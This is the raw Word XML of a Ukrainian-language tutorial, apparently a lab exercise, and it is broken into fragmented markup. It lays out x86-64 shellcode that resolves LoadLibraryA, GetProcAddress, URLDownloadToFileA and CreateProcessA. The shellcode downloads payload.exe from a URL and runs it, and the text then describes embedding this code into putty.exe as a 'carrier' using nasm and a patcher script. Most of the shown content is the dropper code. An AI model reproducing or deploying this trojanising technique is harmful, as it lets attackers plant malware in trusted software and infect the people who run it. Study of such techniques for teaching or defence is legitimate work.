          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB3787" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r w:rsidR="00EB3787">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ходить</w:t>
      </w:r>
      <w:r w:rsidR="0048448E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37116" w:rsidRPr="00C37116">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:r w:rsidR="0048448E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="0048448E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="0048448E" w:rsidRPr="005800CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ernel</w:t>
      </w:r>
      <w:r w:rsidR="0048448E" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="0048448E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C178B9E" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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KERNEL32.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E53D0E3" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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ea</w:t>
      </w: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315BD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szKernel32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70817FE9" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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all</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="00315BD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LoadLibraryA]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314F9C4" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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315BD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hKernel32], </w:t>
      </w:r>
      <w:r w:rsidRPr="00315BD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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEB23D" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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CreateProcessA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8A66E" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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315BD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315BD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hKernel32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A57C63" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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ea</w:t>
      </w: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315BD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dx</w:t>
      </w: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szCreateProcessA]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1C52B" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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all</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="00315BD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GetProcAddress]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C15EF57" w14:textId="77777777" w:rsidR="00315BD0" w:rsidRPr="00315BD0" w:rsidRDefault="00315BD0" w:rsidP="00315B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315BD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315BD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315BD0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CreateProcessA], </w:t>
      </w:r>
      <w:r w:rsidRPr="00315BD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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54527037" w14:textId="77777777" w:rsidR="007C19BC" w:rsidRDefault="007C19BC" w:rsidP="007C19BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329EA7C1" w14:textId="6F4EC192" w:rsidR="001E60AC" w:rsidRPr="00E43E7F" w:rsidRDefault="003B5C89" w:rsidP="001E60AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="001E60AC" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001E60AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завант</w:t>
      </w:r>
      <w:r w:rsidR="007D02FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ажує </w:t>
      </w:r>
      <w:r w:rsidR="00045D12" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>ur</w:t>
      </w:r>
      <w:r w:rsidR="00CA5AE6" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>lmon</w:t>
      </w:r>
      <w:r w:rsidR="001E60AC" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E60AC" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">dll </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B967680" w14:textId="598D00AD" w:rsidR="001E60AC" w:rsidRPr="0048448E" w:rsidRDefault="003B5C89" w:rsidP="001E60AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="001E60AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007D02FA" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r w:rsidR="007D02FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ходить</w:t>
      </w:r>
      <w:r w:rsidR="001E60AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C641CF" w:rsidRPr="00C641CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URLDownloadToFileA</w:t>
      </w:r>
      <w:r w:rsidR="00C641CF" w:rsidRPr="007D02FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E60AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00461D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>urlmon</w:t>
      </w:r>
      <w:r w:rsidR="001E60AC" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E60AC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB181D7" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE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URLMON.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CEFB50" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE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ea</w:t>
      </w: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203AE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szUrlmon]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE1B5" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE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all</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="00203AE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LoadLibraryA]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635EDF0D" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE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203AE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hUrlmon], </w:t>
      </w:r>
      <w:r w:rsidRPr="00203AE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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499FF121" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE6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URLDownloadToFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F25F0D" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE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203AE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203AE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hUrlmon]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483523F4" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE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ea</w:t>
      </w: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203AE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dx</w:t>
      </w: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szURLDownloadToFileA]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B12441" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE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all</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="00203AE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GetProcAddress]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC89892" w14:textId="77777777" w:rsidR="00203AE6" w:rsidRPr="00203AE6" w:rsidRDefault="00203AE6" w:rsidP="00203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203AE6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</w:t>
      </w:r>
      <w:r w:rsidRPr="00203AE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203AE6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URLDownloadToFileA], </w:t>
      </w:r>
      <w:r w:rsidRPr="00203AE6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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F24DC7" w14:textId="77777777" w:rsidR="001E60AC" w:rsidRPr="00BC3A14" w:rsidRDefault="001E60AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C59CD22" w14:textId="2F3BF42D" w:rsidR="00F4430D" w:rsidRDefault="00323546">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00323546">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00AC0538">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0058403D" w:rsidRPr="0058403D">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D313EA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Скач</w:t>
      </w:r>
      <w:r w:rsidR="00AB1D45">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ує</w:t>
      </w:r>
      <w:r w:rsidR="0058403D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0058403D" w:rsidRPr="0099560C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB4B9F1" w14:textId="77777777" w:rsidR="001B23A1" w:rsidRPr="001B23A1" w:rsidRDefault="001B23A1" w:rsidP="001B23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1B23A1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Download payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E55F9" w14:textId="77777777" w:rsidR="001B23A1" w:rsidRPr="001B23A1" w:rsidRDefault="001B23A1" w:rsidP="001B23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1B23A1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1B23A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1B23A1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</w:p>
    <w:p w14:paraId="36452260" w14:textId="77777777" w:rsidR="001B23A1" w:rsidRPr="001B23A1" w:rsidRDefault="001B23A1" w:rsidP="001B23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1B23A1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ea</w:t>
      </w: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1B23A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dx</w:t>
      </w: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szUrl]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15448C87" w14:textId="77777777" w:rsidR="001B23A1" w:rsidRPr="001B23A1" w:rsidRDefault="001B23A1" w:rsidP="001B23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1B23A1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ea</w:t>
      </w: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1B23A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8</w:t>
      </w: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szPayload]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CFCDBF" w14:textId="77777777" w:rsidR="001B23A1" w:rsidRPr="001B23A1" w:rsidRDefault="001B23A1" w:rsidP="001B23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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="001B23A1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1B23A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9</w:t>
      </w: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1B23A1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</w:p>
    <w:p w14:paraId="1C14BC6E" w14:textId="77777777" w:rsidR="001B23A1" w:rsidRPr="001B23A1" w:rsidRDefault="001B23A1" w:rsidP="001B23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1B23A1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1B23A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</w:t>
      </w:r>
      <w:r w:rsidRPr="001B23A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sp</w:t>
      </w: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+</w:t>
      </w:r>
      <w:r w:rsidRPr="001B23A1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32</w:t>
      </w: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, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B23A1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</w:p>
    <w:p w14:paraId="628D8999" w14:textId="77777777" w:rsidR="001B23A1" w:rsidRPr="001B23A1" w:rsidRDefault="001B23A1" w:rsidP="001B23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1B23A1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all</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="001B23A1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1B23A1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URLDownloadToFileA]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5142AF7A" w14:textId="77777777" w:rsidR="008777EA" w:rsidRPr="001B23A1" w:rsidRDefault="008777EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E369DEF" w14:textId="0A6CEFAD" w:rsidR="008B301B" w:rsidRDefault="008B301B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8. Викон</w:t>
      </w:r>
      <w:r w:rsidR="00AB1D45">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ує</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005528D7" w:rsidRPr="0099560C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C909CF" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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Run payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A3233" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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ea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stStartupInfo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B4ACDD" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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ea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3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stProcessInfo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E586810" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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409CF61E" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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F74EBB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</w:p>
    <w:p w14:paraId="609AC19A" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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ea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dx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szPayload]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C020F95" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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8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F74EBB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</w:p>
    <w:p w14:paraId="661C8A6A" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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9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F74EBB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</w:p>
    <w:p w14:paraId="6FF6E2B1" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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sp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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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32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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D638680" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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sp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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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40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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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</w:p>
    <w:p w14:paraId="1E2BD36A" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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sp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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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48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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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</w:p>
    <w:p w14:paraId="125A472D" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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sp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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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6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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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</w:p>
    <w:p w14:paraId="2C694FA2" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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sp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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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64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, 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</w:p>
    <w:p w14:paraId="5F20BBDD" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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sp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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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72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, 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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3E81A" w14:textId="77777777" w:rsidR="00F74EBB" w:rsidRPr="00F74EBB" w:rsidRDefault="00F74EBB" w:rsidP="00F74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74EBB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all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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74EBB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F74EBB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CreateProcessA]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBDF2E" w14:textId="77777777" w:rsidR="0037151B" w:rsidRDefault="0037151B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479FAEEF" w14:textId="77777777" w:rsidR="005A075E" w:rsidRPr="005A075E" w:rsidRDefault="005A075E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48855BF7" w14:textId="7C28A9E5" w:rsidR="005A075E" w:rsidRDefault="005A075E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В якості "носія"</w:t>
      </w:r>
      <w:r w:rsidR="00C92983">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> використаємо</w:t>
      </w:r>
      <w:r w:rsidR="00ED6D07" w:rsidRPr="00283E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED6D07">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">програму </w:t>
      </w:r>
      <w:r w:rsidR="00ED6D07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Putty</w:t>
      </w:r>
      <w:r w:rsidR="00283E62" w:rsidRPr="00283E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00283E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>яка відкриває</w:t>
      </w:r>
      <w:r w:rsidR="000E3043">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E3043" w:rsidRPr="000E3043">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та</w:t>
      </w:r>
      <w:r w:rsidR="000E3043">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ке</w:t>
      </w:r>
      <w:r w:rsidR="00283E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> вікно:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4664C171" w14:textId="7DC7D92F" w:rsidR="00283E62" w:rsidRPr="00283E62" w:rsidRDefault="00F7025B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76E3DABB" wp14:editId="1D410E41">
            <wp:extent cx="6645910" cy="4539615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1956382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821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6DAE" w14:textId="77777777" w:rsidR="005A075E" w:rsidRPr="00283E62" w:rsidRDefault="005A075E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F80867C" w14:textId="477B14B5" w:rsidR="00BF5DE1" w:rsidRPr="00BF5DE1" w:rsidRDefault="00571EBF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Скомпілюємо </w:t>
      </w:r>
      <w:r w:rsidR="00EE0628">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">шелкод </w:t>
      </w:r>
      <w:r w:rsidR="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tas</w:t>
      </w:r>
      <w:r w:rsidR="00725868">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="002339AC" w:rsidRPr="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1_</w:t>
      </w:r>
      <w:r w:rsidR="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F904AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03AB2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F904AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0628">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE0628">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та</w:t>
      </w:r>
      <w:r w:rsidR="00B60F80">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> пропатчимо</w:t>
      </w:r>
      <w:r w:rsidR="00774DB2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00651EC3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>putty</w:t>
      </w:r>
      <w:r w:rsidR="00774DB2" w:rsidRPr="00D03AB2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00774DB2" w:rsidRPr="00F904AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00774DB2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF5DE1" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidR="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а допомогою</w:t>
      </w:r>
      <w:r w:rsidR="00955AD6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF5DE1" w:rsidRPr="0057235B">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>patcher</w:t>
      </w:r>
      <w:r w:rsidR="00BF5DE1" w:rsidRPr="0057235B">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BF5DE1" w:rsidRPr="0057235B">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidR="00BF5DE1" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C065801" w14:textId="6CEF32E6" w:rsidR="005D72A3" w:rsidRPr="00BF5DE1" w:rsidRDefault="00985549">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00B60F80" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nasm</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00546DB9" w:rsidRPr="0018363E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
